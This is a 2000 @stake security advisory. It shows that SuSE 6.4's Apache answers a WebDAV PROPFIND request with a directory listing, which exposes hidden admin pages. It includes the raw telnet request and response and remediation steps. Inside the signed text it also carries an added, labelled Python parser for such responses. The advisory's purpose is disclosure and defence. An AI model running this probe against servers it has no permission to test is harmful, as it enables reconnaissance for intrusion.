
Title: SuSE Apache WebDAV Directory Listings (A090700-3)
Released by: @stake
Date: 7th September 2000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                               @stake Inc.
                            www.atstake.com
                       www.cerberus-infosec.co.uk

                           Security Advisory

Advisory Name: SuSE Apache WebDAV Directory Listings (A090700-3)
 Release Date: 09/07/2000
  Application: Apache 1.3.12
     Platform: SuSE Linux 6.4
     Severity: Attackers are able to retrieve directory listings
       Author: mnemonix (dlitchfield@atstake.com)
Vendor Status: Vendor has updated Apache package
          Web: www.atstake.com/research/advisories/2000/a090700-3.txt


Overview:

WebDAV (Web Distributed Authoring and Versioning) is an extension to the
HTTP (Hypertext Transfer Protocol) 1.1 protocol, the protocol that drives
the Web, and is described in RFC 2518
(http://ftp.isi.edu/in-notes/rfc2518.txt). Essentially, WebDAV exists to
allow users to create, edit and share documents over the Internet or
intranets using HTTP. To facilitate this, new request methods have been
added on top of the standard GET, POST and HEAD methods, such as PROPFIND,
PROPPATCH, MKCOL, COPY, DELETE and PUT.

Detailed Description:

One of these, PROPFIND, is of interest as far as this particular issue is
concerned. PROPFIND exists to allow users to query properties of
resources, such as the display name, the last-modified time and so on.
The Apache web server as installed by SuSE 6.4 has WebDAV "turned on". By
making a request to the web server similar to the following, it is
possible to gain what amounts to a directory listing:




suse~: # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PROPFIND / HTTP/1.1
Host: suse
Content-Type: text/xml
Content-Length: 110

[110-byte XML request body not preserved in this copy of the advisory]

HTTP/1.1 207 Multi-Status
Date: Sun, 20 Aug 2000 17:38:58 GMT
Server: Apache/1.3.12 (Unix)  (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14 mod_perl/1.21 PHP/3.0.15
Transfer-Encoding: chunked
Content-Type: text/xml; charset="utf-8"

dc1
[XML element tags not preserved in this copy; each href is followed by its status]
/secret/secret/sql_tool.html
HTTP/1.1 200 OK
/secret/secret/change-passwd.html
HTTP/1.1 200 OK
/secret/secret/add-user.shmtl
HTTP/1.1 200 OK
/secret/secret/
HTTP/1.1 200 OK
/secret/
HTTP/1.1 200 OK
/webalizer/
HTTP/1.1 200 OK
/test.php3
HTTP/1.1 200 OK
/date.php3
HTTP/1.1 200 OK
/linbot/
HTTP/1.1 200 OK
/robots.txt
HTTP/1.1 200 OK
/index.html
HTTP/1.1 200 OK
/gif/u_arrow.gif
..
---cut-----




What are the security ramifications of this? Looking at the server's
response, one can see a directory called /secret/secret/ with three files
stored there called sql_tool.html, add-user.html and change-passwd.html.
These pages exist for administration purposes and there are no links to
them from the site. To be able to access them a user needs to know of
their existence - a poor method of access control, but one which is quite
common. Further to this, it would be possible to look for files that may
have been left by developers, such as test.html or script.cgi.old, which
often allow greater access than their production equivalents or, due to a
.old or .bak file extension, are not executed, so that access to the
source can be gained.
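To turn a captured 207 Multi-Status response like the one above into something a site owner can act on, here is an added example (not part of the @stake advisory): it decodes the chunked body, pulls every href and its status out of the RFC 2518 XML, and reports the resources the site never links to. The sample response is constructed inline, modelled on the listing above.

```python
import xml.etree.ElementTree as ET

DAV = "{DAV:}"  # ElementTree's Clark notation for the xmlns:D="DAV:" namespace


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: hex size line (the 'dc1' in the
    advisory's response), CRLF, data, CRLF, ...; a zero-size chunk ends it."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += body[pos:pos + size]
        pos += size + 2  # step over the CRLF that terminates the chunk data


def parse_multistatus(xml_body: bytes) -> list:
    """Return [(href, status), ...] from a 207 Multi-Status body (RFC 2518)."""
    listing = []
    for resp in ET.fromstring(xml_body).iter(DAV + "response"):
        href = (resp.findtext(DAV + "href") or "").strip()
        status = (resp.findtext(DAV + "propstat/" + DAV + "status") or "").strip()
        listing.append((href, status))
    return listing


def unlinked_paths(listing: list, linked: set) -> list:
    """Resources the server reports as present that the site never links to:
    exactly the hidden admin pages the advisory warns about."""
    return [h for h, s in listing if s.endswith("200 OK") and h not in linked]


# Constructed sample modelled on the advisory's listing, then chunked the way
# Apache sent it: two data chunks followed by the terminating zero-size chunk.
SAMPLE_XML = (
    b'<?xml version="1.0" encoding="utf-8"?><D:multistatus xmlns:D="DAV:">'
    b'<D:response><D:href>/secret/secret/sql_tool.html</D:href><D:propstat>'
    b'<D:prop/><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response>'
    b'<D:response><D:href>/index.html</D:href><D:propstat>'
    b'<D:prop/><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response>'
    b'</D:multistatus>'
)
_cut = len(SAMPLE_XML) // 2
SAMPLE_BODY = (b"%x\r\n%s\r\n" % (_cut, SAMPLE_XML[:_cut])
               + b"%x\r\n%s\r\n" % (len(SAMPLE_XML) - _cut, SAMPLE_XML[_cut:])
               + b"0\r\n\r\n")
```

Run the same parser over a response captured from your own server and compare the result against the set of paths your site actually links to.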





Solution:

If you want to leave WebDAV enabled for some directories, open httpd.conf
in your text editor of choice, e.g. pico or vi, and add the following for
each directory you want to enable WebDAV for:

#add other directives as needed such as Order allow,deny
DAV On

Stop and restart Apache.

If you want to simply turn WebDAV off, open httpd.conf and find

DAV On

and change "On" to "Off". By default there is only one directory with the
IfDefine DAV directive, namely "/usr/local/httpd/htdocs". If other
directories have been given this directive, change these too. Stop and
restart Apache.

If you want Apache to start without the WebDAV module, edit
/etc/rc.d/rc3.d/S20apache and place a "#" in front of the line that reads

test -e /usr/lib/apache/libdav.so && MODULES="-D DAV $MODULES"

When Apache is next started, this module will then not be included.





Vendor Response:

SuSE have updated their Apache package and more information is available
from http://www.suse.de/de/support/security/

For more advisories: http://www.atstake.com/research/index.html
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBObe8plESXwDtLdMhEQLV7gCgoxc7U9OU+SHtcV4DqndE5VG7DLgAoNyA
GLL7pLekKvTSgd5BJO8NikgK
=pBZF
-----END PGP SIGNATURE-----







